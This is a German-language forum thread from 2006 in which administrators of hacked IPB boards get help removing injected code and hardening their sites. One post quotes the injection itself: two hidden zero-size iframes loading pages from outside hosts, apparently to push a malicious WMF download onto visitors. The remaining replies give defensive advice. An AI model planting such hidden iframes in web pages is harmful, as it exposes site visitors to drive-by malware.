RubberDuck 0 Report post Posted March 27, 2006 (edited) Hallo, habe erst vor kurzem die seite übernommen ( www.gfeclan.de )und noch keine erfahrung mit dem IPB board aber es sieht so aus als ob jemand das Board gehackt hat . Und zwar kommt beim öfnen des forums ein fenster wo ich eine datei herunterladen soll (xpladv463.wmf von traffbuck.biz) und eine Skript-eingabeaufforderung und das war es (AOL-Browser). Der Explorer arbeitet erst gar nicht bzw er wechselt sich ab keine rückmeldung und wird ausgeführt aber das forum wird nicht geladen . Edited March 27, 2006 by RubberDuck Share this post Link to post
Tweedle-Dee 0 Report post Posted March 27, 2006 Scheint am Browser zu liegen, bei mir im Firefox/Linux kann ich das besagte Forum ohne Probleme besuchen. Ich werde nicht gefragt, ob ich eine Datei runterladen will, etc. Lade dir mal einen anderen Broswer runter und nutze nicht AOL/Explorer und versuch dann es mal. Share this post Link to post
MacTV 0 Report post Posted March 27, 2006 Also das Board wurde "angehackt" und im Wapper ist was drin was da nicht rein gehört ! <iframe src="http://196.regvista.com/index.php?ref=wde" width="0" height="0" frameborder="0"></iframe> <iframe src="http://traffbucks.biz/dl/adv463.php" width="0" height="0" frameborder="0"></iframe> Share this post Link to post
RubberDuck 0 Report post Posted March 27, 2006 (edited) Also danke schon mal aber wo finde ich die datei Wapper? habe schon einiges durchsucht scheint so als wenn ich blind währe. Edited March 27, 2006 by RubberDuck Share this post Link to post
MacTV 0 Report post Posted March 27, 2006 ACP > Skins & Templates > Manage Skin Sets > Board Wrappers Share this post Link to post
Tweedle-Dee 0 Report post Posted March 27, 2006 Geh mal ins das Admin CP! Linkes Menu -> Skins and Templates Dann "Board Wrappers" (erscheint unter "Skins and Templates") wählen und dann im Hauptfenster (rechtes Fenster) bei dem Skin auf Edit gehen. Share this post Link to post
RubberDuck 0 Report post Posted March 27, 2006 Besten Dank habt mir sehr geholfen Share this post Link to post
wortmax 0 Report post Posted April 24, 2006 Dieser Thread hat mir soeben auch geholfen. Vielen Dank!!! Kann mir jemand Tipps geben, welche Maßnahmen bei meinem Board am erforderlichsten sind, um sich in Zukunft vor solchen Attacken besser zu schützen? FTP-Passwort und Datenbankpasswort habe ich geändert. Aber da wird's sicher noch etwas mehr für mich zu tun geben. Hier die Adresse zum Board: Drop City Ost Danke im voraus, viele Grüße usw. Share this post Link to post
Tweedle-Dee 0 Report post Posted April 24, 2006 (edited) @wortmax: Schütze Dein admin.php (Einstiegsseite zum Admin CP) noch durch eine .htacess und .htpsswd Datei. Wies' geht, findste hier mithilfe der Suchfunktion. Edited April 24, 2006 by Tweedle-Dee Share this post Link to post
wortmax 0 Report post Posted April 24, 2006 Lieben Dank! Da werde ich mich nachher gleich mal drauf stürzen. Holger Share this post Link to post
Mr.S 0 Report post Posted May 11, 2006 Hatte soeben das selbe Problem, ebenfalls in der Wrapper eine iframe drinnen gewesen, der nicht reingehört. Hab jetzt mal die Schreibrechte am Server bestimmter dateien herunter gesetzt! htacces schutz für die admin.php folgt demnächst! Share this post Link to post